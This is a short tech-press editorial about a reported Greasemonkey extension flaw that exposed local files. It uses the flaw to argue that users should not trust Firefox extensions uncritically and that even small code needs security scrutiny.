X
Business

Don't monkey about with security

Greasemonkey illustrates the need to treat the tiniest sliver of code with the same critical concern as the most lumbering of applications
Written by Leader , Contributor

The rise in popularity of the Mozilla Foundation's Firefox browser has seen a concomitant increase in the number of extensions available to add neat little bits of functionality. With a couple of clicks you can download everything from FlashGot, which lets you download all links on a page with a single click to DNSStuff Toolbar, for looking up DNS information. And they all, of course, work within your browser.

Also included in the menagerie of extensions is Greasemonkey, which uses JavaScript to let you customise the way a Web page displays. This week, that innocuous piece of code was found to contain a flaw that would let attackers read any file on your hard drive and list the contents of directories.

Many users will be dismayed to discover that an extension — "not even a real program!" they will exhort — could be so dangerous. Extensions are small — some would say cute — little add-ons that we tend to download without a second thought.

Part of the problem is the widespread perception among Firefox users that their choice of browser is more secure than IE. That may well be true, but smugness breeds complacency, and that is dangerous.

Even assuming that we can trust writers who post extensions, we can't assume that the code has been rigorously assessed for security. Many Firefox users will trust Firefox, and the natural inclination is to extend that confer that trust on Firefox's extensions too.

Just as users like to find the easiest way to anything — whether it is their job or just downloading music — hackers will settle on the easiest way into a system. You can make it harder for them, but there will always be more ways.

An exploit doesn't care how it gets in. Security is stacked against the defender. You need to defend every point of entry, whereas an attacker only needs to find one way in.

There are many technical arguments about how much security to build into each part of a system, whether running code in a sandbox area isolated from the rest of the computer can prevent attacks. Ideas like this help, but in the end useful software needs access to real resources.

It will come down to risk analysis: is this thing so useful I'm prepared to accept the risk that it might have an unknown flaw in it that could compromise what I'm doing? The tiniest piece of code must always be treated with the same critical concern as lumbering applications.

Editorial standards